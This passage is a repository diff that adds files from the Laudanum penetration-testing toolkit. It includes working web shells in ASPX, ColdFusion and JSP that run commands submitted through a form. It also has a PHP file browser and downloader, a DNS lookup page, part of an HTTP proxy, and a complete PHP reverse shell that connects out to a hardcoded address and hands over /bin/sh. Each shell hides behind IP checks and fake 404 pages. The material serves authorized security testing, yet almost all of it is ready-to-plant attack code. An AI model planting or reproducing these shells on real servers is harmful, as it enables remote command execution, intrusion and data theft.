Response.Write("You Don't Have Access to this directory: " + Server.HtmlEncode(dir));
Response.End();
}
%>
<%
System.IO.DirectoryInfo di = new System.IO.DirectoryInfo(dir);
System.IO.FileInfo[] files = di.GetFiles();
foreach (System.IO.FileInfo f in files)
{
Response.Write("<tr><td><a href=\"" + "file.aspx" + "?dir=" + Server.UrlEncode(dir) + "&file=" + Server.UrlEncode(f.FullName) + "\">" + Server.HtmlEncode(f.Name) + "</a></td><td>" + f.CreationTime.ToString() + "</td><td>" + f.Length.ToString() + "</td></tr>");
}
%>
</table>
</body>
</html>

129
Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/aspx/shell.aspx Executable file
View file

@ -0,0 +1,129 @@
<%@ Page Language="C#"%>
<%@ Import Namespace="System" %>
<script runat="server">
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@securitywhole.com>
***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides shell access to the system.
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
string stdout = "";
string stderr = "";
void die() {
//HttpContext.Current.Response.Clear();
HttpContext.Current.Response.StatusCode = 404;
HttpContext.Current.Response.StatusDescription = "Not Found";
HttpContext.Current.Response.Write("<h1>404 Not Found</h1>");
HttpContext.Current.Server.ClearError();
HttpContext.Current.Response.End();
}
void Page_Load(object sender, System.EventArgs e) {
// Check for an IP in the range we want
string[] allowedIps = new string[] {"::1","192.168.0.1", "127.0.0.1"};
// check if the X-Fordarded-For header exits
string remoteIp;
if (HttpContext.Current.Request.Headers["X-Forwarded-For"] == null) {
remoteIp = Request.UserHostAddress;
} else {
remoteIp = HttpContext.Current.Request.Headers["X-Forwarded-For"].Split(new char[] { ',' })[0];
}
bool validIp = false;
foreach (string ip in allowedIps) {
validIp = (validIp || (remoteIp == ip));
}
if (!validIp) {
die();
}
if (Request.Form["c"] != null) {
// do or do not, there is no try
//try {
// create the ProcessStartInfo using "cmd" as the program to be run, and "/c " as the parameters.
// "/c" tells cmd that we want it to execute the command that follows, and exit.
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + Request.Form["c"]);
// The following commands are needed to redirect the standard output and standard error.
procStartInfo.RedirectStandardOutput = true;
procStartInfo.RedirectStandardError = true;
procStartInfo.UseShellExecute = false;
// Do not create the black window.
procStartInfo.CreateNoWindow = true;
// Now we create a process, assign its ProcessStartInfo and start it
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo = procStartInfo;
p.Start();
// Get the output and error into a string
stdout = p.StandardOutput.ReadToEnd();
stderr = p.StandardError.ReadToEnd();
//}
//catch (Exception objException)
//{
}
}
</script>
<html>
<head><title>Laundanum ASPX Shell</title></head>
<body onload="document.shell.c.focus()">
<form method="post" name="shell">
cmd /c <input type="text" name="c"/>
<input type="submit"><br/>
STDOUT:<br/>
<pre><% = stdout.Replace("<", "&lt;") %></pre>
<br/>
<br/>
<br/>
STDERR:<br/>
<pre><% = stderr.Replace("<", "&lt;") %></pre>
</form>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>

80
Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/cfm/shell.cfm Executable file
View file

@ -0,0 +1,80 @@
<cfapplication scriptProtect="none">
<!---
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com>
***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides access to shell acces on the system.
*** Modified by Tim Medin
***
********************************************************************************
***
*** TODO: Fix the problem with quotes
*** Add authentication
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1^
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
--->
<cfif #cgi.remote_addr# neq "1.1.1.1">
<cfheader statuscode="404" statustext="Page Not Found" />
<cfabort />
</cfif>
<html>
<head><title>Laudanum Coldfusion Shell</title></head>
<body>
<form action="shell.cfm" method="POST">
<cfif IsDefined("form.cmd")>
Executable: <Input type="text" name="cmd" value="<cfoutput>#HTMLEditFormat(form.cmd)#</cfoutput>"> For Windows use: cmd.exe or the full path to cmd.exe<br>
Arguments: <Input type="text" name="arguments" value="<cfoutput>#HTMLEditFormat(form.arguments)#</cfoutput>"> For Windows use: /c <i>command</i><br>
<cfelse>
Executable: <Input type="text" name="cmd" value="cmd.exe"><br>
Arguments: <Input type="text" name="arguments" value="/c "><br>
</cfif>
<input type="submit">
</form>
<cfif IsDefined("form.cmd")>
<pre>
<cfexecute name="#Replace(preservesinglequotes(form.cmd), QuoteMark, DoubleQuoteMark, 'All')#" arguments="#Replace(preservesinglequotes(form.arguments), QuoteMark, DoubleQuoteMark, 'All')#" timeout="5" variable="foo"></cfexecute>
<cfoutput>#Replace(foo, "<", "&lt;", "All")#</cfoutput>
</pre>
</cfif>
Note: The cold fusion command that executes shell commands strips quotes, both double and single, so be aware.
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>

BIN
Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/jsp/cmd.war Executable file
View file

Binary file not shown.

3
Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/jsp/makewar.sh Executable file
View file

@ -0,0 +1,3 @@
#!/bin/sh
jar -cvf cmd.war warfiles/*

3
Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF Executable file
View file

@ -0,0 +1,3 @@
Manifest-Version: 1.0
Created-By: 1.6.0_10 (Sun Microsystems Inc.)

11
Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml Executable file
View file

@ -0,0 +1,11 @@
<?xml version="1.0" ?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
version="2.4">
<servlet>
<servlet-name>Command</servlet-name>
<jsp-file>/cmd.jsp</jsp-file>
</servlet>
</web-app>

41
Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/jsp/warfiles/cmd.jsp Executable file
View file

@ -0,0 +1,41 @@
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getRemoteAddr() != "4.4.4.4") {
response.sendError(HttpServletResponse.SC_NOT_FOUND)
return;
}
%>
<HTML>
<TITLE>Laudanum JSP Shell</TITLE>
<BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send"><br/>
If you use this against a Windows box you may need to prefix your command with cmd.exe /c
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</BODY></HTML>

161
Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/php/dns.php Executable file
View file

@ -0,0 +1,161 @@
<?php
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com>
***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides access to DNS on the system.
*** Written by Tim Medin <tim@securitywhole.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
// ***************** Config entries below ***********************
// IPs are enterable as individual addresses TODO: add CIDR support
$allowedIPs = array("19.168.2.16", "192.168.1.100");
# *********** No editable content below this line **************
$allowed = 0;
foreach ($allowedIPs as $IP) {
if ($_SERVER["REMOTE_ADDR"] == $IP)
$allowed = 1;
}
if ($allowed == 0) {
header("HTTP/1.0 404 Not Found");
die();
}
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum PHP DNS Access</title>
</head>
<body>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
<hr>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>');
}
}
set_error_handler('error_handler');
/* Initialize some variables we need again and again. */
$query = isset($_POST['query']) ? $_POST['query'] : '';
$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY';
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum PHP DNS Access</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
function init() {
document.dns.query.focus();
}
</script>
</head>
<body onload="init()">
<h1>DNS Query 0.1</h1>
<form name="dns" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST">
<fieldset>
<legend>DNS Lookup:</legend>
<p>Query:<input name="query" type="text">
Type:<select name="type">
<?php
$types = array("A" => DNS_A, "CNAME" => DNS_CNAME, "HINFO" => DNS_HINFO, "MX" => DNS_MX, "NS" => DNS_NS, "PTR" => DNS_PTR, "SOA" => DNS_SOA, "TXT" => DNS_TXT, "AAAA" => DNS_AAAA, "SRV" => DNS_SRV, "NAPTR" => DNS_NAPTR, "A6" => DNS_A6, "ALL" => DNS_ALL, "ANY" => DNS_ANY);
if (!in_array($type, array_keys($types))) {
$type = "ANY";
}
$validtype = 0;
foreach (array_keys($types) as $t) {
echo " <option value=\"$t\"" . (($type == $t) ? " SELECTED" : "") . ">$t</option>\n";
}
?>
</select>
<input type="submit" value="Submit">
</fieldset>
</form>
<?php
if ($query != '')
{
$result = dns_get_record($query, $types[$type], $authns, $addtl);
echo "<pre><results>";
echo "Result = ";
print_r($result);
echo "Auth NS = ";
print_r($authns);
echo "Additional = ";
print_r($addtl);
echo "</results></pre>";
}
?>
<hr>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>

195
Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/php/file.php Executable file
View file

@ -0,0 +1,195 @@
<?php
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com>
***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file allows browsing of the file system.
*** Written by Tim Medin <tim@securitywhole.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
// ***************** Config entries below ***********************
// IPs are enterable as individual addresses TODO: add CIDR support
$allowedIPs = array("192.168.1.1","127.0.0.1");
# *********** No editable content below this line **************
$allowed = 0;
foreach ($allowedIPs as $IP) {
if ($_SERVER["REMOTE_ADDR"] == $IP)
$allowed = 1;
}
if ($allowed == 0) {
header("HTTP/1.0 404 Not Found");
die();
}
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum PHP File Browser</title>
</head>
<body>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
<hr>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>');
}
}
set_error_handler('error_handler');
/* Initialize some variables we need again and again. */
$dir = isset($_GET["dir"]) ? $_GET["dir"] : ".";
$file = isset($_GET["file"]) ? $_GET["file"] : "";
if ($file != "") {
if(file_exists($file)) {
$s = split("/", $file);
$filename = $s[count($s) - 1];
header("Content-type: application/x-download");
header("Content-Length: ".filesize($file));
header("Content-Disposition: attachment; filename=\"".$filename."\"");
readfile($file);
die();
}
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum File Browser</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
</script>
</head>
<body onload="init()">
<h1>Laudanum File Browser 0.1</h1>
<a href="<?php echo $_SERVER['PHP_SELF'] ?>">Home</a><br/>
<?php
// get the actual path, add an ending / if necessary
$curdir = realpath($dir);
$curdir .= substr($curdir, -1) != "/" ? "/" : "";
$dirs = split("/",$curdir);
// Create the breadcrumb
echo "<h2>Directory listing of <a href=\"" . $_SERVER['PHP_SELF'] . "?dir=/\">/</a> ";
$breadcrumb = '/';
foreach ($dirs as $d) {
if ($d != '') {
$breadcrumb .= $d . "/";
echo "<a href=\"" . $_SERVER['PHP_SELF'] . "?dir=" . urlencode($breadcrumb) . "\">$d/</a> ";
}
}
echo "</h2>";
// translate .. to a real dir
$parentdir = "";
for ($i = 0; $i < count($dirs) - 2; $i++) {
$parentdir .= $dirs[$i] . "/";
}
echo "<table>";
echo "<tr><th>Name</th><th>Date</th><th>Size</th></tr>";
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?dir=$parentdir\">../</a></td><td> </td><td> </td></tr>";
//get listing, separate into directories and files
$listingfiles = array();
$listingdirs = array();
if ($handle = @opendir($curdir)) {
while ($o = readdir($handle)) {
if ($o == "." || $o == "..") continue;
if (@filetype($curdir . $o) == "dir") {
$listingdirs[] = $o . "/";
}
else {
$listingfiles[] = $o;
}
}
@natcasesort($listingdirs);
@natcasesort($listingfiles);
//display directories
foreach ($listingdirs as $f) {
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?dir=" . urlencode($curdir . $f) . "\">" . $f . "</a></td><td align=\"right\">" . "</td><td> <td></tr>";
}
//display files
foreach ($listingfiles as $f) {
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?file=" . urlencode($curdir . $f) . "\">" . $f . "</a></td><td align=\"right\">" . "</td><td align=\"right\">" . number_format(@filesize($curdir . $f)) . "<td></tr>";
}
}
else {
echo "<tr><td colspan=\"3\"><h1>Can't open directory</h1></td></tr>";
}
?>
</table>
<hr>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>

192
Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/php/php-reverse-shell.php Executable file
View file

@ -0,0 +1,192 @@
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.2.2.1'; // CHANGE THIS
$port = 8888; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>

351
Vulnerabilities_and_Exploits/Payloads/laudanum-0.8/php/proxy.php Executable file
View file

@ -0,0 +1,351 @@
<?php
ini_set('session.use_cookies', '0');
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@securitywhole.com>
***
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file allows browsing of the file system.
*** Written by Tim Medin <tim@securitywhole.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
// TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page
// figure out how to reuse sessionid from the remote site
// ***************** Config entries below ***********************
// IPs are enterable as individual addresses TODO: add CIDR support
$allowedIPs = array("19.168.2.16", "192.168.1.100","127.0.0.1","192.168.10.129","192.168.10.1");
# *********** No editable content below this line **************
$allowed = 0;
foreach ($allowedIPs as $IP) {
if ($_SERVER["REMOTE_ADDR"] == $IP)
$allowed = 1;
}
if ($allowed == 0) {
header("HTTP/1.0 404 Not Found");
die();
}
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum PHP Proxy</title>
</head>
<body>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
<hr>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>');
}
}
set_error_handler('error_handler');
function geturlarray($u) {
// creates the url array, addes a scheme if it is missing and retries parsing
$o = parse_url($u);
if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); }
if (!isset($o["path"])) { $o["path"] = "/"; }
return $o;
}
function buildurl ($u) {
// build the url from the url array
// this is used because the built in function isn't
// avilable in all installs of php
if (!isset($u["host"])) { return null; }
$s = isset($u["scheme"]) ? $u["scheme"] : "http";
$s .= "://" . $u["host"];
$s .= isset($u["port"]) ? ":" . $u["port"] : "";
$s .= isset($u["path"]) ? $u["path"] : "/";
$s .= isset($u["query"]) ? "?" . $u["query"] : "";
$s .= isset($u["fragment"]) ? "#" . $u["fragment"] : "";
return $s;
}
function buildurlpath ($u) {
//gets the full url and attempts to remove the file at the end of the url
// e.g. http://blah.com/dir/file.ext => http://blah.com/dir/
if (!isset($u["host"])) { return null; }
$s = isset($u["scheme"])? $u["scheme"] : "http";
$s .= "://" . $u["host"];
$s .= isset($u["port"]) ? ":" . $u["port"] : "";
$path = isset($u["path"]) ? $u["path"] : "/";
// is the last portion of the path a file or a dir?
// assume if there is a . it is a file
// if it ends in a / then it is a dir
// if neither, than assume dir
$dirs = explode("/", $path);
$last = $dirs[count($dirs) - 1];
if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) {
// its a file, remove the last chunk
$path = substr($path, 0, -1 * strlen($last));
}
$s .= $path;
return $s;
}
function getfilename ($u) {
// returns the file name
// e.g. http://blah.com/dir/file.ext returns file.ext
// technically, it is the last portion of the url, so there is a potential
// for a problem if a http://blah.com/dir returns a file
$s = explode("/", $u["path"]);
return $s[count($s) - 1];
}
function getcontenttype ($headers) {
// gets the content type
foreach($headers as $h) {
if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) {
return $out[1][0];
}
}
}
function getcontentencoding ($headers) {
foreach ($headers as $h) {
if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) {
return $out[1][0];
}
}
}
function removeheader($header, $headers) {
foreach (array_keys($headers) as $key) {
if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) {
unset($headers[$key]);
return $headers;
}
}
}
function rewritecookies($headers) {
// removes the path and domain from cookies
for ($i = 0; $i < count($headers); $i++) {
if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) {
$headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]);
$headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]);
}
}
return $headers;
}
function getsessionid($headers) {
for ($i = 0; $i < count($headers); $i++) {
if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out))
return $out[1][0];
}
return "0";
}
function compatible_gzinflate($gzData) {
if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) {
$i = 10;
$flg = ord( substr($gzData, 3, 1) );
if ( $flg > 0 ) {
if ( $flg & 4 ) {
list($xlen) = unpack('v', substr($gzData, $i, 2) );
$i = $i + 2 + $xlen;
}
if ( $flg & 8 )
$i = strpos($gzData, "\0", $i) + 1;
if ( $flg & 16 )
$i = strpos($gzData, "\0", $i) + 1;
if ( $flg & 2 )
$i = $i + 2;
}
return @gzinflate( substr($gzData, $i, -8) );
} else {
return false;
}
return false;
}
function rewrite ($d, $u) {
$r = $d;
//rewrite images and links - absolute reference
